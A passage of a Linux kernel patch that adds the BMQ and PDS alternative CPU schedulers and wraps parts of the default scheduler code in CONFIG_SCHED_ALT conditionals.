++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
++ * and never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
